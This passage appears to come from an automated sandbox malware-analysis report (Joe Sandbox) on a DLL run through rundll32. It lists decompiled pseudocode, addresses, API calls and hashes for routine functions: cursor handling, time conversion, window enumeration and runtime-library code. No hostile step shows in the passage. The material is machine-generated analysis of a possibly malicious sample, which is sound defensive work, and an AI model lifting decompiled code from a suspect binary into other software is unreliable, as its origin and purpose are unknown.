				struct tagPOINT _v12;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t21;
				signed int _t22;
				signed int _t28;
				void* _t29;
				void* _t33;
				signed int _t34;
				intOrPtr* _t37;

				_t29 = __ebx;
				_push(__ecx);
				_push(__ecx);
				_t37 = __ecx;
				if(_a8 == 1) {
					GetCursorPos( &_v12);
					ScreenToClient( *(_a4 + 0x20),  &_v12);
					_t21 = E1002DBEF(_t37, __eflags, _v12.x, _v12.y);
					__eflags = _t21;
					if(_t21 < 0) {
						goto L1;
					}
					_push(_t33);
					_t32 = _t37;
					_t34 = E1002D941(_t37, _t33, _t21);
					__eflags = _t34 - 8;
					if(_t34 != 8) {
						L7:
						__eflags = _t34 - 0xa;
						if(__eflags >= 0) {
							E1000836F(_t29, _t32, _t34, _t37, __eflags);
						}
						L9:
						SetCursor( *(0x100991a8 + _t34 * 4));
						_t22 = 1;
						__eflags = 1;
						L10:
						return _t22;
					}
					_push(_v12.y);
					_t28 = PtInRect(_t37 + 8, _v12);
					__eflags = _t28;
					if(_t28 != 0) {
						goto L9;
					}
					__eflags =  *(_t37 + 4) & 0x00000004;
					if(( *(_t37 + 4) & 0x00000004) == 0) {
						goto L9;
					}
					_t34 = 9;
					goto L7;
				}
				L1:
				_t22 = 0;
				goto L10;
			}














                                                                                                        0x1002e006
                                                                                                        0x1002e009
                                                                                                        0x1002e00a
                                                                                                        0x1002e010
                                                                                                        0x1002e012
                                                                                                        0x1002e01c
                                                                                                        0x1002e02c
                                                                                                        0x1002e03a
                                                                                                        0x1002e03f
                                                                                                        0x1002e041
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002e043
                                                                                                        0x1002e045
                                                                                                        0x1002e04c
                                                                                                        0x1002e04e
                                                                                                        0x1002e051
                                                                                                        0x1002e070
                                                                                                        0x1002e070
                                                                                                        0x1002e073
                                                                                                        0x1002e075
                                                                                                        0x1002e075
                                                                                                        0x1002e07a
                                                                                                        0x1002e081
                                                                                                        0x1002e089
                                                                                                        0x1002e089
                                                                                                        0x1002e08b
                                                                                                        0x1002e08d
                                                                                                        0x1002e08d
                                                                                                        0x1002e053
                                                                                                        0x1002e05d
                                                                                                        0x1002e063
                                                                                                        0x1002e065
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002e067
                                                                                                        0x1002e06b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002e06f
                                                                                                        0x00000000
                                                                                                        0x1002e06f
                                                                                                        0x1002e014
                                                                                                        0x1002e014
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetCursorPos.USER32(?), ref: 1002E01C
                                                                                                        • ScreenToClient.USER32 ref: 1002E02C
                                                                                                        • PtInRect.USER32(?,?,?), ref: 1002E05D
                                                                                                        • SetCursor.USER32(00000000,?,?,?,?,?,?,?,10016E3E,?,?,?,?), ref: 1002E081
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Cursor$ClientRectScreen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2390797981-0
                                                                                                        • Opcode ID: a9abb34cb98f277d707bb7e7bae4d3ff0d3bc2f2f2ea8917eb2102ee4ba9cb04
                                                                                                        • Instruction ID: 791318b90d64d38265a52a78ea0392a30d2ed37d4304caab3f00ae5e0b43f854
                                                                                                        • Opcode Fuzzy Hash: a9abb34cb98f277d707bb7e7bae4d3ff0d3bc2f2f2ea8917eb2102ee4ba9cb04
                                                                                                        • Instruction Fuzzy Hash: 6901C036640196BFDF10DBA5DC88E8E7BB9EF48350F800025F909E6021E770EE829B20
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10025A85, Relevance: 6.1, APIs: 4, Instructions: 52timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 82%
                                                                                                        			E10025A85(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4, struct _FILETIME* _a8) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				char _v36;
				intOrPtr _v48;
				void* __ebp;
				short _t24;
				int _t27;
				int _t29;
				intOrPtr _t38;
				intOrPtr _t48;
				void* _t55;
				void* _t58;

				_t49 = __edi;
				_t40 = __ebx;
				_t55 = _t58;
				if(_a8 != 0) {
					_push(__esi);
					_v28.wYear = E10025882();
					_v28.wMonth = E100258A2();
					_v28.wDay = E100258BE();
					_v28.wHour = E100258D9();
					_v28.wMinute = E100258F5();
					_t24 = E10025911();
					_v28.wMilliseconds = _v28.wMilliseconds & 0x00000000;
					_v28.wSecond = _t24;
					_t27 = SystemTimeToFileTime( &_v28,  &_v12);
					_t52 = GetLastError;
					if(_t27 == 0) {
						L10030711(__ebx, __edi, GetLastError, _t55, GetLastError(), 0);
					}
					_t29 = LocalFileTimeToFileTime( &_v12, _a8);
					if(_t29 == 0) {
						_t29 = L10030711(_t40, _t49, _t52, _t55, GetLastError(), _t29);
					}
					return _t29;
				} else {
					_push(_t55);
					_push(__ecx);
					_v36 = 0x100712f0;
					E1003EF44( &_v36, 0x10067284);
					asm("int3");
					_push(4);
					E1003EE82(0x10052ebc, __ebx, __edi, __esi);
					_t48 = E10029C33(0x104);
					_v48 = _t48;
					_t38 = 0;
					_v36 = 0;
					if(_t48 != 0) {
						_t38 = E1000A475(_t48);
					}
					return E1003EF21(_t38);
				}
			}















                                                                                                        0x10025a85
                                                                                                        0x10025a85
                                                                                                        0x10025a86
                                                                                                        0x10025a8f
                                                                                                        0x10025a96
                                                                                                        0x10025aa3
                                                                                                        0x10025aae
                                                                                                        0x10025ab9
                                                                                                        0x10025ac4
                                                                                                        0x10025acf
                                                                                                        0x10025ad3
                                                                                                        0x10025ad8
                                                                                                        0x10025add
                                                                                                        0x10025ae9
                                                                                                        0x10025af1
                                                                                                        0x10025af7
                                                                                                        0x10025afe
                                                                                                        0x10025afe
                                                                                                        0x10025b0a
                                                                                                        0x10025b12
                                                                                                        0x10025b18
                                                                                                        0x10025b18
                                                                                                        0x10025b1f
                                                                                                        0x10025a91
                                                                                                        0x1000836f
                                                                                                        0x10008372
                                                                                                        0x1000837c
                                                                                                        0x10008383
                                                                                                        0x10008388
                                                                                                        0x10008389
                                                                                                        0x10008390
                                                                                                        0x1000839f
                                                                                                        0x100083a1
                                                                                                        0x100083a4
                                                                                                        0x100083a8
                                                                                                        0x100083ab
                                                                                                        0x100083ad
                                                                                                        0x100083ad
                                                                                                        0x100083b7
                                                                                                        0x100083b7

                                                                                                        APIs
                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 10025AE9
                                                                                                        • GetLastError.KERNEL32(00000000), ref: 10025AFB
                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,00000000), ref: 10025B0A
                                                                                                        • GetLastError.KERNEL32(00000000), ref: 10025B15
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Time$File$ErrorLast$LocalSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 1172841412-0
                                                                                                        • Opcode ID: 894e86763a1647e6b861eae4a0b1652b910a36e5a5e852b12ff19705ff0e6fcd
                                                                                                        • Instruction ID: a1c56f44cfdff319654fb8919c51a7ff2848a5b762cfe4f26907821dc1b991ec
                                                                                                        • Opcode Fuzzy Hash: 894e86763a1647e6b861eae4a0b1652b910a36e5a5e852b12ff19705ff0e6fcd
                                                                                                        • Instruction Fuzzy Hash: 4F016129E1026DA6DF00EBF4984699E7BBCEF04611F404046E802B7251EFB5AB408BDD
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002F123, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 93%
                                                                                                        			E1002F123(void* __ecx, void* __eflags) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t9;
				void* _t11;
				int _t13;
				void* _t23;
				intOrPtr* _t30;
				void* _t32;
				void* _t34;
				void* _t35;

				_push(__ecx);
				_t23 = __ecx;
				_t9 = E1000775D(__eflags, 0x10);
				_t37 = _t9;
				if(_t9 == 0) {
					_t30 = 0;
					__eflags = 0;
				} else {
					_t30 = E1002F106(_t9, _t37);
				}
				_t11 = GetCurrentProcess();
				_t13 = DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2);
				_t34 = _t32;
				if(_t13 == 0) {
					if(_t30 != 0) {
						 *((intOrPtr*)( *_t30 + 4))(1);
					}
					L10030711(_t23, _t30, _t34, _t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t30 + 4)) = _v8;
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t30;
			}
















                                                                                                        0x1002f126
                                                                                                        0x1002f12b
                                                                                                        0x1002f12d
                                                                                                        0x1002f132
                                                                                                        0x1002f135
                                                                                                        0x1002f142
                                                                                                        0x1002f142
                                                                                                        0x1002f137
                                                                                                        0x1002f13e
                                                                                                        0x1002f13e
                                                                                                        0x1002f155
                                                                                                        0x1002f15e
                                                                                                        0x1002f166
                                                                                                        0x1002f167
                                                                                                        0x1002f16b
                                                                                                        0x1002f173
                                                                                                        0x1002f173
                                                                                                        0x1002f180
                                                                                                        0x1002f180
                                                                                                        0x1002f188
                                                                                                        0x1002f18e
                                                                                                        0x1002f196

                                                                                                        APIs
                                                                                                          • Part of subcall function 1000775D: _malloc.LIBCMT ref: 10007777
                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 1002F155
                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000), ref: 1002F15B
                                                                                                        • DuplicateHandle.KERNEL32(00000000), ref: 1002F15E
                                                                                                        • GetLastError.KERNEL32(?), ref: 1002F179
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 3704204646-0
                                                                                                        • Opcode ID: 181124b0a72ddab3b984726ea908e0ad10e71abd6c3574166a280de630d29e6b
                                                                                                        • Instruction ID: cd322e7513c6ac6ad6ac0a7b1c10adea35624bb9e47b03c235d11dc91bc2e213
                                                                                                        • Opcode Fuzzy Hash: 181124b0a72ddab3b984726ea908e0ad10e71abd6c3574166a280de630d29e6b
                                                                                                        • Instruction Fuzzy Hash: 2401A735700204BFEB10DBA5DD89F1A7BA9EF84790F544429FD08DB291EB70EC108B60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10037973, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 94%
                                                                                                        			E10037973(void* __ebx, void* __ecx, void* __edx, struct tagPOINT* _a8) {
				struct tagPOINT _v12;
				void* __edi;
				struct tagPOINT* _t8;
				struct HWND__* _t9;
				int _t14;
				long _t19;
				void* _t20;
				struct HWND__* _t22;
				struct HWND__* _t23;
				struct HWND__* _t26;

				_t20 = __edx;
				_t8 = _a8;
				_v12.x = _t8->x;
				_t19 = _t8->y;
				_push(_t19);
				_v12.y = _t19;
				_t9 = WindowFromPoint( *_t8);
				_t26 = _t9;
				if(_t26 != 0) {
					_t22 = GetParent(_t26);
					if(_t22 == 0 || E10029831(__ebx, _t20, _t22, _t22, 2) == 0) {
						ScreenToClient(_t26,  &_v12);
						_t23 = E100298D3(_t26, _v12.x, _v12.y);
						if(_t23 == 0) {
							L6:
							_t9 = _t26;
						} else {
							_t14 = IsWindowEnabled(_t23);
							_t9 = _t23;
							if(_t14 != 0) {
								goto L6;
							}
						}
					} else {
						_t9 = _t22;
					}
				}
				return _t9;
			}













                                                                                                        0x10037973
                                                                                                        0x10037978
                                                                                                        0x1003797e
                                                                                                        0x10037981
                                                                                                        0x10037984
                                                                                                        0x10037987
                                                                                                        0x1003798a
                                                                                                        0x10037990
                                                                                                        0x10037994
                                                                                                        0x1003799e
                                                                                                        0x100379a2
                                                                                                        0x100379b9
                                                                                                        0x100379cb
                                                                                                        0x100379cf
                                                                                                        0x100379de
                                                                                                        0x100379de
                                                                                                        0x100379d1
                                                                                                        0x100379d2
                                                                                                        0x100379da
                                                                                                        0x100379dc
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100379dc
                                                                                                        0x100379b0
                                                                                                        0x100379b0
                                                                                                        0x100379b0
                                                                                                        0x100379e0
                                                                                                        0x100379e3

                                                                                                        APIs
                                                                                                        • WindowFromPoint.USER32(?,?), ref: 1003798A
                                                                                                        • GetParent.USER32(00000000), ref: 10037998
                                                                                                        • ScreenToClient.USER32 ref: 100379B9
                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 100379D2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$ClientEnabledFromParentPointScreen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1871804413-0
                                                                                                        • Opcode ID: 626a3877109c41edea482a46b08a08c39026c642097ed229554150f96915be55
                                                                                                        • Instruction ID: 4463cf6aecc86cd5d7cb116d97b5f3d00f66973d4a6b894517a54b6ed9a5452e
                                                                                                        • Opcode Fuzzy Hash: 626a3877109c41edea482a46b08a08c39026c642097ed229554150f96915be55
                                                                                                        • Instruction Fuzzy Hash: DB014F76600514BFD712DB689C45EAE7AB9FF89681B11426AF905EB310DB30DE01D7A0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1000F078, Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 77%
                                                                                                        			E1000F078(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				struct HWND__* _t25;

				_t23 = __ecx;
				_t22 = __ebx;
				_t24 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t25 = _t16;
					if(_t25 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t25, _a8, _a12, _a16);
					} else {
						_t20 = E1000E60C(_t23, _t24, _t25, __eflags, _t25);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20);
							E1000ED9D(_t22, _t24, _t25, __eflags);
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t25);
						__eflags = _t18;
						if(_t18 != 0) {
							E1000F078(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
						}
					}
					_t16 = GetWindow(_t25, 2);
				}
				return _t16;
			}













                                                                                                        0x1000f078
                                                                                                        0x1000f078
                                                                                                        0x1000f080
                                                                                                        0x1000f086
                                                                                                        0x1000f0e9
                                                                                                        0x1000f0e9
                                                                                                        0x1000f0ed
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000f08a
                                                                                                        0x1000f08e
                                                                                                        0x1000f0b8
                                                                                                        0x1000f090
                                                                                                        0x1000f091
                                                                                                        0x1000f096
                                                                                                        0x1000f098
                                                                                                        0x1000f09a
                                                                                                        0x1000f09d
                                                                                                        0x1000f0a0
                                                                                                        0x1000f0a3
                                                                                                        0x1000f0a6
                                                                                                        0x1000f0a7
                                                                                                        0x1000f0a7
                                                                                                        0x1000f098
                                                                                                        0x1000f0be
                                                                                                        0x1000f0c2
                                                                                                        0x1000f0c5
                                                                                                        0x1000f0c7
                                                                                                        0x1000f0c9
                                                                                                        0x1000f0db
                                                                                                        0x1000f0db
                                                                                                        0x1000f0c9
                                                                                                        0x1000f0e3
                                                                                                        0x1000f0e3
                                                                                                        0x1000f0f2

                                                                                                        APIs
                                                                                                        • GetTopWindow.USER32(?), ref: 1000F086
                                                                                                        • GetTopWindow.USER32(00000000), ref: 1000F0C5
                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 1000F0E3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window
                                                                                                        • String ID:
                                                                                                        • API String ID: 2353593579-0
                                                                                                        • Opcode ID: e08f19b7db489d1086e43c3b35a20f97fdb811987ef9703aa3a945a20e764dca
                                                                                                        • Instruction ID: de77be5b58460ce5d7dfb4ee9012cfaf8b93253514764d2a155b22be99aaeaf3
                                                                                                        • Opcode Fuzzy Hash: e08f19b7db489d1086e43c3b35a20f97fdb811987ef9703aa3a945a20e764dca
                                                                                                        • Instruction Fuzzy Hash: 3801E93600161ABBEF229F91CD05EEE3B66EF083D0F018019FE0461466C776D961EFA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1000E914, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 96%
                                                                                                        			E1000E914(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				void* _t18;

				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t15 = GetTopWindow;
				_t16 = _t9;
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						__eflags = _t17;
						if(_t17 == 0) {
							goto L10;
						}
						_t10 = E1000E914(_t13, _t14, _t17, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E1000E5E5(_t13, _t14, _t18);
						}
						_t10 = E1000E60C(_t14, _t15, _t16, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E1000E914(__ebx, _t14, _t16, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}













                                                                                                        0x1000e914
                                                                                                        0x1000e914
                                                                                                        0x1000e91f
                                                                                                        0x1000e925
                                                                                                        0x1000e92b
                                                                                                        0x1000e92f
                                                                                                        0x1000e95f
                                                                                                        0x1000e962
                                                                                                        0x1000e97f
                                                                                                        0x1000e97f
                                                                                                        0x1000e981
                                                                                                        0x1000e983
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000e96d
                                                                                                        0x1000e972
                                                                                                        0x1000e974
                                                                                                        0x1000e979
                                                                                                        0x00000000
                                                                                                        0x1000e979
                                                                                                        0x00000000
                                                                                                        0x1000e974
                                                                                                        0x1000e931
                                                                                                        0x1000e936
                                                                                                        0x1000e948
                                                                                                        0x1000e94c
                                                                                                        0x1000e94d
                                                                                                        0x00000000
                                                                                                        0x1000e94f
                                                                                                        0x1000e956
                                                                                                        0x1000e95b
                                                                                                        0x1000e95d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000e938
                                                                                                        0x1000e93f
                                                                                                        0x1000e946
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000e946
                                                                                                        0x1000e936
                                                                                                        0x1000e988
                                                                                                        0x1000e988

                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32 ref: 1000E91F
                                                                                                        • GetTopWindow.USER32(00000000), ref: 1000E932
                                                                                                          • Part of subcall function 1000E914: GetWindow.USER32(00000000,00000002), ref: 1000E979
                                                                                                        • GetTopWindow.USER32(?), ref: 1000E962
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Item
                                                                                                        • String ID:
                                                                                                        • API String ID: 369458955-0
                                                                                                        • Opcode ID: a556e0c49768c2abed676af79b472f4de9bd01ff89526e28c69b2114369fb2f8
                                                                                                        • Instruction ID: e28da74711936ccb001e1d8733593f053651feefeeff26f491adb6f8d19bd10a
                                                                                                        • Opcode Fuzzy Hash: a556e0c49768c2abed676af79b472f4de9bd01ff89526e28c69b2114369fb2f8
                                                                                                        • Instruction Fuzzy Hash: A5018F361016E6A7FB629B608C04E8E3AA8EF467E0B024010FD10B1129EB31CE119BA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100453B3, Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 89%
                                                                                                        			E100453B3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x1006ce20);
				E1003F350(__ebx, __edi, __esi);
				_t31 = E10045AAA(__edx, __edi, _t35);
				_t15 =  *0x10072f08; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E1004091C(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x10072e10; // 0x3fb1300
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x100729e8;
								if(__eflags != 0) {
									_push(_t33);
									E10039F30(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x10072e10; // 0x3fb1300
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x10072e10; // 0x3fb1300
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E1004544E();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E1003FD9B(_t25, _t29, _t31, 0x20);
				}
				return E1003F395(_t33);
			}










                                                                                                        0x100453b3
                                                                                                        0x100453b3
                                                                                                        0x100453b3
                                                                                                        0x100453b3
                                                                                                        0x100453b5
                                                                                                        0x100453ba
                                                                                                        0x100453c4
                                                                                                        0x100453c6
                                                                                                        0x100453ce
                                                                                                        0x100453ef
                                                                                                        0x100453f5
                                                                                                        0x100453f9
                                                                                                        0x100453fc
                                                                                                        0x100453ff
                                                                                                        0x10045405
                                                                                                        0x10045407
                                                                                                        0x10045409
                                                                                                        0x1004540c
                                                                                                        0x10045412
                                                                                                        0x10045414
                                                                                                        0x10045416
                                                                                                        0x1004541c
                                                                                                        0x1004541e
                                                                                                        0x1004541f
                                                                                                        0x10045424
                                                                                                        0x1004541c
                                                                                                        0x10045414
                                                                                                        0x10045425
                                                                                                        0x1004542a
                                                                                                        0x1004542d
                                                                                                        0x10045433
                                                                                                        0x10045437
                                                                                                        0x10045437
                                                                                                        0x1004543d
                                                                                                        0x10045444
                                                                                                        0x100453d6
                                                                                                        0x100453d6
                                                                                                        0x100453d6
                                                                                                        0x100453db
                                                                                                        0x100453df
                                                                                                        0x100453e4
                                                                                                        0x100453ec

                                                                                                        APIs
                                                                                                          • Part of subcall function 10045AAA: __getptd_noexit.LIBCMT ref: 10045AAB
                                                                                                          • Part of subcall function 10045AAA: __amsg_exit.LIBCMT ref: 10045AB8
                                                                                                        • __amsg_exit.LIBCMT ref: 100453DF
                                                                                                        • __lock.LIBCMT ref: 100453EF
                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 1004540C
                                                                                                        • InterlockedIncrement.KERNEL32(03FB1300), ref: 10045437
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
